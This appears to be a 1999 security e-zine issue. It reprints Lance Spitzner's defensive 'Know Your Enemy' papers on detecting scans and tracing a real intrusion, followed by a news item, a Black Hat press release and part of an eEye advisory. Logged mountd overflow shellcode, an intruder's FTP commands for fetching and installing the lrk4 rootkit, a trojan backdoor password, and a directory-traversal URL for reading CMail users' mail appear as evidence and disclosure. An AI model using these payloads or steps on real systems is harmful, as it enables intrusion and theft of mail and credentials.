RST. The logs from such a scan looks as follows (NOTE: Only the first five entries are included here)..
/var/log/secure
Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by
peer
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by
peer
Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by
peer
Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by
peer
Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown
Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset
by peer
Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown
Notice all the errors in the connections. Since the SYN-ACK sequence is torn down before a complete connection can be
made, the daemon cannot determine the source system. The logs show that you have been scanned, unfortunately you do not
know by whom. What is even more alarming is, on most other systems (including newer kernels of Linux), none of these errors
would have been logged. To qoute Fyodor " ... based on all the 'connection reset by peer' messages. This is a Linux 2.0.XX
oddity -- virtually every other system (including the 2.2 and later 2.1 kernels) will show nothing. That bug (accept() returning
before completion of the 3-way handshake) was fixed.
Nmap includes other stealth option, such as -sF, -sX, -sN where various flags are used, This is what the logs look like for
these scans
/var/log/secure
Notice something here, no logs! Scary huh, you just got scanned and didn't even know it. All three types of scans determined
the same results, however you are able to fully log only the first type, -sT (full connection). To detect these stealsth scans, you
will need to use a different logging application such as tcplogd, scanlogd, or ippl Some commercial Firewalls will also detect
and log all of these scans (I have confirmed this on Checkpoint Firewall 1).
Did They Gain Access?
Once you have determined that you were scanned, and what you were looking for, the next big question is "Did they get in?".
Most of today's remote exploits are based on buffer overflows (otherwise known as smashing the stack). Simply stated, a
buffer overflow is when a program (usually a daemon) receives more input then it expected, thus overwriting critical areas in
memory. Certain code is then executed, usually giving the user root access. For more info on buffer overflows, check
Aleph1's excellent paper at ftp://ftp.technotronic.com/rfc/phrack49-14.txt.
You can normally identify buffer overflow attacks in the /var/log/messages log file (or /var/adm/messages for other flavors of
Unix) for attacks such as mountd. You will also see similar logs in maillog for such attacks against imapd. A buffer overflow
attack would look like this.
Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 192.168.11.200.
Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together
Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P3Û3À°^[Í~@3Ò3À~KÚ°^FÍ~@þÂuô1À°^BÍ~@~EÀubëb^V¬<ýt^FþÀt^Këõ°0þÈ~HFÿëì^°^B~
I^FþÈ~IF^D°^F~IF^H°f1ÛþÃ~IñÍ~@~I^F°^Bf~IF^L°*f~IF^N~MF^L~IF^D1À~IF^P°^P~IF^H°
fþÃÍ~@°^A~IF^D°f³^DÍ~@ë^DëLëR1À~IF^D~IF^H°fþÃÍ~@~Hð?1ÉÍ~@°?þÁÍ~@°?þÁÍ~@¸.bin@~
I^F¸.sh!@~IF^D1À~HF^G~Iv^H~IF^L°^K~Ió~MN^H~MV^LÍ~@1À°^A1ÛÍ~@èEÿÿÿÿýÿPrivet
ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51
mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^
E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E
^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E
^H(-^E^H(-^E
When you see something like this in your log files, someone has attempted to exploit your system. It is difficult to determine if
the exploit was successful. One way to do this is, following the exploit attempt, see if there are any connections from the
remote source to your system. If they successfully login from the remote system, they have access. Another clue is if you find
the accounts "moof", "rewt", "crak0", or "w0rm" added to your /etc/passwd file. These accounts, uid 0, are added by some of
the more common exploit scripts. Once a blackhat gains access, normally the first thing they do is wipe your logs clean and
trojan your logging (syslogd), for more information, see Know Your Enemy: III. From this point on, you will not receive any
logs from your system as everything has been compromised. What you do next is subject for another article :). Until then, I
recommend you check out http://www.cert.org/nav/recovering.html
To help me find anomalies in my log files, I whipped up a shell script that scans my logs for me For more detailed information
on grepping and sorting log files, check out this posting by Marcus Ranum.
Bourne shell script Korn shell script
#!/bin/bash
#
# Created 20 April, 1999
# Lance Spitzner, lance@spitzner.net
#
# Shows last 10 entries of critical system logs.
# Build in some "artificial intelligence" using
# greps and sorts. You can select a specific
# hosts logs, or you can select all hosts logs.
#
# Add whatever grep/sort statements you want to the
# functions below. The ones included are just
# examples.
##### Build variables
if [ "$1" = "all" ]; then
system=""
else
system=$1
fi
log=$2
##### Functions
secure () {
echo -e "\n\t--- Last 10 entries in /var/log/secure ---\n"
grep "$system" /var/log/secure | grep -v "172.16.1." | tail -10
}
messages () {
echo -e "\n\t--- Last 10 entries in /var/log/messages ---\n"
grep "$system" /var/log/messages | grep -E -v '(named|MARK)' | tail -10
}
maillog () {
echo -e "\n\t--- Last 10 entries in /var/log/maillog ---\n"
grep "$system" /var/log/maillog | tail -10
}
title () {
if [ "$system" = "" ]; then
echo -e "\n### These are the log results of all systems ###"
else
echo -e "\n### These are the log results of system $system ###"
fi
}
##### Actual program
case $log in
secure)
title
secure
;;
messages)
title
messages
;;
maillog)
title
maillog
;;
all)
title
secure
messages
maillog
;;
*)
echo -e "\nUsage: `basename $0` <host> <log>"
echo
echo " <host> "
echo " Can either be a single source you want to grep"
echo " for in the log, or type \"all\" for all hosts in the"
echo " log file."
echo
echo " <log>"
echo " secure -> for /var/log/secure"
echo " messages -> for /var/log/messages"
echo " maillog -> for /var/log/maillog"
echo -e "\tall -> for all three log files\n"
;;
esac
exit 0
-=-
#!/bin/ksh
#
# Created 20 April, 1999
# Lance Spitzner, lance@spitzner.net
#
# Shows last 10 entries of critical system logs.
# Build in some "artificial intelligence" using
# greps and sorts. You can select a specific
# hosts logs, or you can select all hosts logs.
#
##### Define input
if [ "$1" = "all" ]; then
system=":"
else
system=$1
fi
log=$2
##### Define logs
inetdlog=/var/adm/inetdlog
messages=/var/adm/messages
syslog=/var/adm/syslog
##### Functions
inetdlog () {
echo "\n\t--- Last 10 entries in $inetdlog ---\n"
grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10
}
messages () {
echo "\n\t--- Last 10 entries in $messages ---\n"
grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10
}
syslog () {
echo "\n\t--- Last 10 entries in $syslog ---\n"
grep "$system" "$syslog" | tail -10
}
title () {
if [ "$system" = ":" ]; then
echo "\n### These are the log results of all systems ###"
else
echo "\n### These are the log results of system $system ###"
fi
}
##### Actual program
case $log in
inetdlog)
title
inetdlog
;;
messages)
title
messages
;;
syslog)
title
syslog
;;
all)
title
inetdlog
messages
syslog
;;
*)
echo "\nUsage: `basename $0` <host> <log>"
echo
echo "\t<host> "
echo "\tCan either be a single source you want to grep"
echo "\tfor in the log, or type \"all\" for all hosts in the"
echo "\tlog file."
echo
echo "\t<log>"
echo "\tinetdlog -> for /var/log/inetdlog"
echo "\tmessages -> for /var/log/messages"
echo "\tsyslog -> for /var/log/syslog"
echo "\tall -> for all three log files\n"
;;
esac
exit 0
Conclusion
Your system logs can tell you a great deal about the enemy. However, the first step is guaranteeing the integrity of your log
files. One of the best ways to do that is use a remote log server that receives and stores logs from all systems. Once secured,
you can then identify patterns in your log files. Based on these patterns and log entries, you can determine what the blackhat is
looking for, and potentially what tools they are using. Based on this knowledge, you can better secure and protect your
systems.
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
Part 3
They Gain Root
Know Your Enemy: III
Lance Spitzner
Last Modified: 23 May, 1999
This article is the third of a series focusing on the script kiddie. The first paper focuses on how script kiddies probe
for, identify, and exploit vulnerabilities. The second paper focuses on how you can detect these attempts, identify
what tools they are using and what vulnerabilities they are looking for. This paper, the third, focuses on what
happens once they gain root. Specifically, how they cover their tracks and what the do next.
Who is the script kiddie
As we learned in the first paper, the script kiddie is not so much a person as it is a strategy, the strategy of probing for the easy
kill. One is not searching for specific information or targeting a specific company, the goal is to gain root the easiest way
possible. Intruders do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Do
not understimate this strategy, sooner or later they find someone vulnerable.
Once they find a vulnerable system and gain root, their first step is normally to cover their tracks. They want to ensure you do
not know your system was hacked and cannot see nor log their actions. Following this, they often use your system to scan
other networks, or silently monitor your own. To gain a better understanding of how they accomplish these acts, we are going
to follow the steps of a system compromised by an intruder using script kiddie tactics. Our system, called mozart, is a Linux
box running Red Hat 5.1. The system was compromised on April 27, 1999. Below are the actual steps our intruder took,
with system logs and keystrokes to verify each step. All system logs were recorded to a protected syslog server, all
keystrokes were captured using sniffit. Throughout this paper our intruder is refered to as he, however we have no idea what
the true gender of the intruder is.
The exploit
On 27 April, at 00:13 hours, our network was scanned by the system 1Cust174.tnt2.long-branch.nj.da.uu.net for several
vulnerabilities, including imap. Our intruder came in noisy, as every system in the network was probed (for more information on
detecting and analyzing scans, please see the second paper of this series).
Apr 27 00:12:25 mozart imapd[939]: connect from 208.252.226.174
Apr 27 00:12:27 bach imapd[1190]: connect from 208.252.226.174
Apr 27 00:12:30 vivaldi imapd[1225]: connect from 208.252.226.174
Apparently he found something he liked and returned at 06:52 and 16:47 the same day. He started off with a more thorough
scan, but this time focusing only on mozart. He identified a weakness and launched a successful attack against mountd, a
commonly known vulnerability for Red Hat 5.1. Here we see in /var/log/messages the intruder gaining root. The tool used
was most likely ADMmountd.c, or something similar to it.
Apr 27 16:47:28 mozart mountd[306]: Unauthorized access by NFS client 208.252.226.174.
Apr 27 16:47:28 mozart syslogd: Cannot glue message parts together
Apr 27 16:47:28 mozart mountd[306]: Blocked attempt of 208.252.226.174 to mount
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
Immediately following this exploit, we see in /var/log/messages our intruder gaining root by telneting in as the user crak0, and
then su to the user rewt. Both of these accounts were added by the exploit script. Our intruder now has total control of our
system.
Apr 27 16:50:27 mozart login[1233]: FAILED LOGIN 2 FROM 1Cust102.tnt1.long-branch.nj.da.uu.net
FOR crak, User not known to the underlying authentication module
Apr 27 16:50:38 mozart PAM_pwdb[1233]: (login) session opened for user crak0 by (uid=0)
Apr 27 16:50:38 mozart login[1233]: LOGIN ON ttyp0 BY crak0 FROM
1Cust102.tnt1.long-branch.nj.da.uu.net
Apr 27 16:50:47 mozart PAM_pwdb[1247]: (su) session opened for user rewt by crak0(uid=0)
Covering their tracks
The intruder is now on our system as root. As we are now about to see, the next step for him is to make sure he does not get
caught. First, he checks to see if anyone else is on the system.
[crak0@mozart /tmp]$ w
4:48pm up 1 day, 18:27, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
crak0 ttyp0 1Cust102.tnt1.lo 4:48pm 0.00s 0.23s 0.04s w
After making sure the coast is clear, he will want to hide all of his actions. This normally entails removing any evidence from the
logs files and replacing system binaries with trojans, such as ps or netstat, so you cannot see the intruder on your own system.
Once the trojans are in place, the intruder has gained total control of your system and you will most likely never know it. Just as
there are automated scripts for hacking, there are also automated tools for hiding intruders, often called rootkits. One of the
more common rootkits is lrk4. By executing the script, a variety of critical files are replaced, hiding the intruder in seconds.
For more detailed information on rootkits, see the README that comes with lrk4. This will give you a better idea how
rootkits work in general.
Within minutes of compromising our system, we see the intruder downloading the rootkit and then implementing the script with
the command "make install". Below are the actual keystrokes the intruder typed to hide himself.
cd /dev/
su rewt
mkdir ". "
cd ". "
ftp technotronic.com
anonymous
fdfsfdsdfssd@aol.com
cd /unix/trojans
get lrk4.unshad.tar.gz
quit
ls
tar -zxvf lrk4.unshad.tar.gz
mv lrk4 proc
mv proc ". "
cd ". "
ls
make install
Notice the first thing that our intruder did, he created the hidden directory ". " to hide his toolkit. This directory does not show
up with the "ls" command, and looks like the local directory with "ls -la" command. One way you can locate the directory is
with the "find" command (be sure you can trust the integrity of your "find" binary).
mozart #find / -depth -name "*.*"
/var/lib/news/.news.daily
/var/spool/at/.SEQ
/dev/. /. /procps-1.01/proc/.depend
/dev/. /.
/dev/.
Our intruder may have been somewhat sophisticated in using trojan binaries, but had a simpler approach to cleaning the logs
files. Instead of using cleaning tools such as zap2 or clean, he copied /dev/null to the files /var/run/utmp and /var/log/utmp,
while deleting /var/log/wtmp. You know something is wrong when these logs files contain no data, or you get the following
error:
[root@mozart sbin]# last -10
last: /var/log/wtmp: No such file or directory
Perhaps this file was removed by the operator to prevent logging last info.
The next step
Once a system has been compromised, intruders tend to do one of two things. First, they use your system as a launching pad
and scan or exploit other systems. Second, they decided to lay low and see what they can learn about your system, such as
accounts for other systems. Our intruder decided for option number two, lay low and see what he could learn. He
implemented a sniffer on our system that would capture all of our network traffic, including telnet and ftp sessions to other
systems. This way he could learn logins and passwords. We see the sytem going into promiscuous mode in /var/log/messages
soon after the compromise.
Apr 27 17:03:38 mozart kernel: eth0: Setting promiscuous mode.
Apr 27 17:03:43 mozart kernel: eth0: Setting promiscuous mode.
After implementing the trojan binaries, clearning the log files, and starting the sniffer, our intruder disconnected from the system.
However, we will see him returning the next day to find what traffic he captured.
Damage Control
Since our friend had disconnected, this gave me a chance to review the system and see what exactly happened. I was
extremely interested to see what was altered, and where he was logging the sniffer information. First, I quickly identified with
Tripwire which files were modified. Tripwire showed the following:
added: -rw-r--r-- root 5 Apr 27 17:01:16 1999 /usr/sbin/sniff.pid
added: -rw-r--r-- root 272 Apr 27 17:18:09 1999 /usr/sbin/tcp.log
changed: -rws--x--x root 15588 Jun 1 05:49:22 1998 /bin/login
changed: drwxr-xr-x root 20480 Apr 10 14:44:37 1999 /usr/bin
changed: -rwxr-xr-x root 52984 Jun 10 04:49:22 1998 /usr/bin/find
changed: -r-sr-sr-x root 126600 Apr 27 11:29:18 1998 /usr/bin/passwd
changed: -r-xr-xr-x root 47604 Jun 3 16:31:57 1998 /usr/bin/top
changed: -r-xr-xr-x root 9712 May 1 01:04:46 1998 /usr/bin/killall
changed: -rws--s--x root 116352 Jun 1 20:25:47 1998 /usr/bin/chfn
changed: -rws--s--x root 115828 Jun 1 20:25:47 1998 /usr/bin/chsh
changed: drwxr-xr-x root 4096 Apr 27 17:01:16 1999 /usr/sbin
changed: -rwxr-xr-x root 137820 Jun 5 09:35:06 1998 /usr/sbin/inetd
changed: -rwxr-xr-x root 7229 Nov 26 00:02:19 1998 /usr/sbin/rpc.nfsd
changed: -rwxr-xr-x root 170460 Apr 24 00:02:19 1998 /usr/sbin/in.rshd
changed: -rwxr-x--- root 235516 Apr 4 22:11:56 1999 /usr/sbin/syslogd
changed: -rwxr-xr-x root 14140 Jun 30 14:56:36 1998 /usr/sbin/tcpd
changed: drwxr-xr-x root 2048 Apr 4 16:52:55 1999 /sbin
changed: -rwxr-xr-x root 19840 Jul 9 17:56:10 1998 /sbin/ifconfig
changed: -rw-r--r-- root 649 Apr 27 16:59:54 1999 /etc/passwd
As you can see, a variety of binaries and files were modified. There were no new entries in /etc/passwd (wisely, he had
removed the crak0 and rewt accounts), so our intruder must have left a backdoor in one of the modified binaries. Also, two
files were added, /usr/sbin/sniff.pid and /usr/sbin/tcp.log. Not suprisingly, /usr/sbin/sniff.pid was the pid of the sniffer,
/usr/sbin/tcp.log was where he was storing all of his captured information. Based on /usr/sbin/sniff.pid, the sniffer turned out to
be rpc.nfsd. Our intruder had compiled a sniffer, in this case linsniffer, and replaced rpc.nfsd with it. This ensured that if the
system was rebooted, the sniffer would be restarted by the init process. Strings confirms rpc.nfsd is the sniffer:
mozart #strings /usr/sbin/rpc.nfsd | tail -15
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
----- [CAPLEN Exceeded]
----- [Timed Out]
----- [RST]
----- [FIN]
%s =>
%s [%d]
sniff.pid
eth0
tcp.log
cant open log
rm %s
After reviewing the system and understanding what happened, I left the system alone. I was curious to see what the intruder's
next steps would be. I did not want him to know that I had caught him, so I removed all of my entries from /usr/sbin/tcp.log.
The Script Kiddie Returns
The following day our friend returned. By logging his keystrokes, I quickly identified the backdoor, /bin/login was trojaned.
This binary, used for telnet connections, was configured to allow the account "rewt" root privileges with the password "satori".
The password "satori" is the default password for all trojaned binaries that the rootkit lrk4 uses, a giveaway that your system
may have been compromised.
The intruder was checking on his sniffer to ensure it was still functioning. Also, he wanted to confirm if any accounts were
captured since the previous day. You can review his keystrokes at keystrokes.txt. Notice at the bottom of the log our
intruder kills the sniffer. This was the last thing he did before terminating the session. However, he quickly returned several
minutes later with another session, only to start the sniffer again. I'm not exactly sure why he did this.
This process of checking the system continued for several days. Every day the intruder would connect to the system to confirm
the sniffer was running and if it had captured any valuable data. After the fourth day, I decided that this was enough and
disconnected the system. I had learned enough from the intruder's actions and was not going to learn anything new.
Conclusion
We have seen in this paper how an intruder may act , from start to finish, once they gain root on your system. They often begin
by checking to see if anyone is on the system. Once they know the coast is clear, they cover their tracks by clearing the logfiles
and replacing or modifying critical files. Once they are safely hidden, they move onto new and more damaging activities. These
tactics are here to stay, as new exploits are constantly being discovered. To better protect yourself against these threats, I
recommend you armor your systems. Basic armoring will protect against most script kiddie threats, as they normally go for the
easy kill. For ideas on how to armor your system, check out Armoring Linux or Armoring Solaris. If it is to late and you feel
your system has already been compromised, a good place to start is CERT's site "Recovering from an Incident" .
Author's bio
Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
@HWA
11.0 Cox Report Blasts DOE Computer Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erewhon
In addition to revealing that China has stole numerous
military secrets from the US the Cox Report, unclassified
yesterday, blasts the Department of Energy on
computer security. The report blamed the DOE for giving
to much computer access to foreign nationals. The
issue is access to systems or information covered by
export control laws. While the systems or software are
not physically exported, use of the technology by some
foreign nationals is called a "deemed export" and is
covered under Department of Commerce rules.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0524/web-doe-5-25-99.html
MAY 25, 1999 . . . 18:25 EDT
House report faults DOE computer access by
foreign nationals
BY ELANA VARON (varon@fcw.com)
A report issued today about theft of U.S. nuclear secrets by China
concludes that the Energy Department has been too free in granting foreign
nationals access to its supercomputers.
The report, by the House Select Committee on U.S. National Security and
Military/Commercial Concerns With the People's Republic of China, said
DOE officials are required to review whether such access violates federal
export controls. But the report also said lab officials "lack an essential
understanding" of the export rules. The report cited interviews with Commerce
Department officials who said they did not recall ever receiving a license
application to "export" the technology from any of the labs.
Although the systems or software are not physically exported, use of the
technology by some foreign nationals is called a "deemed export" because
sending the technology overseas would require a license. The report said the
labs do not measure the power of their systems in such a way that they could
determine which systems are subject to the export rules, and lab officials never
asked Commerce how to determine if the DOE systems were subject to
export control.
The report also concluded that foreign graduate students and staff at U.S.
universities who are conducting DOE-supported research have the same
computer privileges as students who are U.S. citizens, even though some of
the foreign students are affiliated with their countries' intelligence agencies.
The report noted that DOE is preparing a counterintelligence plan that
addresses these issues.
@HWA
12.0 Black Hat Briefings Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Code Kid
Come and meet the Hackers. Secure Computing has officially announced Black Hat '99
the third annual meeting of the minds between security professionals, white and black
hat hackers. (If you are deep in the Security business and can only go to one conference
then this is it.) (And Microsoft is now a cosponsor, how ironic is that?)
PR Newswire
http://biz.yahoo.com/prnews/990525/ca_secure__1.html
BlackHat
http://www.blackhat.com/
PR Newswire;
Tuesday May 25, 8:45 am Eastern Time
Company Press Release
SOURCE: Secure Computing Corporation
Secure Computing Corporation Announces Black Hat
Briefings '99, Bringing Together Corporate and
Government Experts, and Hackers to Address Y2K And Enterprise
Security
SAN JOSE, Calif., May 25 /PRNewswire/ -- Secure Computing (Nasdaq: SCUR - news) today
announced that Secure Computing Black Hat Briefings '99, the exclusive security
conference, will take place from July 7-8, 1999 at the Venetian Hotel on the Las Vegas
Strip. This third annual conference brings corporate and government engineers and software
programmers face-to-face with today's cutting edge computer security experts and
``underground'' security specialists for two days of intensive discussions on who's
breaking in to computer networks, how they are doing it, how Y2K is affecting security,
and what can be done to address this.
The conference, with title sponsorship by Secure Computing, and lead sponsorship by
Microsoft (Nasdaq: MSFT - news),National Computer Security Center, Counterpane Systems
and Network Flight Recorders is designed to fill the need of computer professionals to
better understand the security risks to their computer and information infrastructures by
potential threats. To do this, Secure Computing assembles a group of vendor neutral
security professionals at the same forum, where they will candidly discuss and debate the
problems businesses face, and the solutions they see to those problems. Secure Computing
Black Hat Briefings '99 is not for security dilettantes or marketers looking to hawk their
vendors' wares -- just straight talk by people who make it their business to explore the
ever-changing security space.
Spanning two days the conference has three separate tracks, two focused at technical
audiences with a third a new ``White Hat'' tract that is focused at CIO's, CEO's and other
senior level people. Topics will include Y2K and what it means to system security, how to
detect and repel attacks on a network, secure programming techniques and tool selection for
creating and effectively monitoring secure networks. Secure Computing Black Hat Briefings
'99 intense sessions will bring to light the security problems confronting organizations
and network administrators, most of which go unnoticed by today's preoccupied
system administrators who are often more worried about network growth, updates and Y2K
problems.
Running the conference is Jeff Moss, Director of Assessment Services at Secure Computing.
Prior to joining Secure Computing, Moss was at Ernst & Young, LLP, where he was a manager
in the Information Security Services (ISS) group. Moss also successfully owned and operated
DEF CON Communications, a computer consulting company that focused on
network security solutions.
``It is crucial that we continue to educate organizations on the risks they face daily.
Network security breaches are real, and are costing organizations hundreds of millions of
dollars every year,'' said Moss. ``The coming year will be crucial for organizations
in regards to their network security. Taking a myopic approach only to the Y2K issue that
does not involve diligent attention to security could lead to severe consequences. Being
Y2K compliant really won't matter for much if an organization's network is rendered
ineffective by hacker attacks and intrusions. That is why a forum like Secure Computing
Black Hat Briefings '99 is so important in educating businesses and governments about the
very real threats that are out there.''
Presenters range from corporate and government security system managers to master hackers
themselves, including Dr.Mudge, one of the prominent members of the hacker group
'The L0pht', who is responsible for numerous advisories and tools in use in both the black
hat and white hat communities; Peter Shipley, who is well known and respected in the
professional world as well as the underground and hacker community and whose specialties
are third party penetration testing and firewall review, computer risk assessment, and
security training; and Bruce Schneier, author of applied Cryptography and president of
Counterpane Systems.
More Information, and How to Register
Detailed information on Secure Computing Black Hat Briefings '99, including a speaker's
schedule, biographies of presenters, and information on how to register and reserve hotel
rooms, can be found via the Secure Computing Web site (http://www.securecomputing.com )
and by clicking on the Black Hat Briefings '99 icon.
About Secure Computing
Headquartered in San Jose, Calif., Secure Computing Corporation provides enterprise-wide
network security solutions to a worldwide partner and customer base in financial services,
telecom, aerospace, manufacturing, hi-tech, service providers and government agencies.
More information is available over the Internet at www.securecomputing.com or by calling:
in the U.S., 800-379-4944 or 408-918-6100; in Europe, 44-1753-826000; in Asia/Pacific,
61-2-9844-5440.
NOTE: All registration and trademarks are proprietary to their respective owners
From secure computing;
The Black Hat Briefings '99, July
7-8th Las Vegas
The Black Hat Briefings '99, July
7-8th Las Vegas
It's late. You're in the office alone, catching up on database
administration. Behind you, your network servers hum along quietly,
reliably. Life is good. No one can get to your data or disrupt your
WAN. The network is secure. Or is it?
The Black Hat Briefings conference has been organized to put an end
to concerns like these. While many conferences focus on information
and network security, only The Black Hat Briefings will put your
engineers and software programmers face-to-face with today's cutting
edge computer security experts and "underground" security specialists.
The "White Hat" track will inform your CEO or CIO with no-nonsense
information about what issues to be aware of, and what they can ignore.
Only the Black Hat Briefings conference will provide your people with
the tools and understanding they need to help thwart those lurking either
in the shadows of your firewall or the depths of your companies WAN.
The reality is, they are out there. The choice is yours. You can live in
fear of them. Or, you can learn from them.
Conference Overview
The Black Hat Briefings conference series was created to fill the need of computer
professionals to better understand the security risks to their computer and information
infrastructures by potential threats. To do this we assemble a group of vendor neutral
security professionals in the same room and let them talk candidly about the problems
businesses face, and the solutions they see to those problems. No gimmicks, just
straight talk by people who make it their business to explore the ever changing security
space.
Spanning two days with three separate tracks, The Black Hat Briefings will focus
on the vital security issues facing organizations with large Enterprise networks and
mixed network operating systems. Topics will Include Intrusion Detection Systems
(IDS), Computer Forensics (CF) systems, Incident Response, secure programming
techniques and tool selection for creating and effectively monitoring your networks. You
will be put face to face with the people developing the tools used by and against
hackers.
This year the Black Hat Briefings has grown to include a separate track specifically
designed for the CEO and CIO. This third track, nick named the "White Hat" track,
was developed by the National Computer Security Center (NCSC) of the
National Security Agency. While the other tracks have a technology focus, this track
is for people who have to manage it. What should you look for when hiring an outside
security consultant? Should you even look outside your organization?
The Black Hat Briefing's intense sessions will bring to light the security and
mis-configuration problems confronting organizations and network administrators, most
of which go unnoticed by today's preoccupied system administrators where security
gets put off in lieu of constant network growth and upgrades. Our speakers will discuss
the strategies involved in correcting existing problems and speak towards what you can
expect in the future.
This year you can expect more visual demonstrations, more speakers who are
authoritative in their fields, and as always an excellent time.
As an added bonus, people who attend The Black Hat Briefings get free admission to
DEF CON 7.0, the largest Hacker convention in the US, held right after Black Hat in Las
Vegas. For more information see their web site.
Who is this conference for?
CEOs and CIOs, MIS and IT managers as well as the people doing the work. Basically
anyone dealing with the security functions at your company looking for deep insight into
the security space.
Registration Costs
Registration costs are $995 US before June 14th 1999
Late registration fees are $1,195 after June 14th.
You may cancel your registration before July 1st for a full refund.
This fee includes two days of speaking, materials, a reception, and meals.
To register, please use the button on the left hand side of this page.
We have excellent rates at the Venetian Hotel! Do not be discourage by its
splendor!
Discount Airfare
We've got great discounts on airfare from Montrose Travel, who book bulk air travel. If you need
to still book airline tickets please give Montrose a call first.
Montrose Travel 1-800-301-9673
http://www.montrosetravel.com
They currently have deals for Black Hatattendees from the US and International on the following
airlines:
America West Southwest Delta
American Southwest Airlines United Airlines
and other smaller carriers and even International Airfare rates.
Expect rates lower than published. When calling make sure you refer to The Black Hat Briefings as
the group name.
13.0 eEYe Digital Security advisory: Multiple Web Interface Security Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Multiple Web Interface Security Holes
Systems Affected
CMail 2.3
FTGate 2,1,2,1
NTMail 4.20
Release Date
May 26, 1999
Advisory Code
AD05261999
Description:
The following holes were found while testing Retina against a few various
services that have web based interfaces. The holes are nothing amazing just
common amongst many web based interfaces. We are sure some other software
will be found with similar holes... if you come across some contact
info@eeye.com and let us know.
---> CMail
The default location of the web based interface for CMail is C:\Program
Files\Computalynx\CMail Server\pages\. It is a simple hole. For example if
we were to load http://[server]:8002/../spool/username/mail.txt in our web
browser we would be looking at the email for that user. Note: Mail.txt is
not the real mail file. There is one minor problem... reading of files is
not totally straight forward. It seems CMail has some mechanism of what it
will read or not. If you have a text file with no carriage returns in it
CMail will not read it. There also exists multiple buffer overflows within
the various SMTP and POP server functions of CMail. Yes they are
exploitable. >:-]
---> FTGate
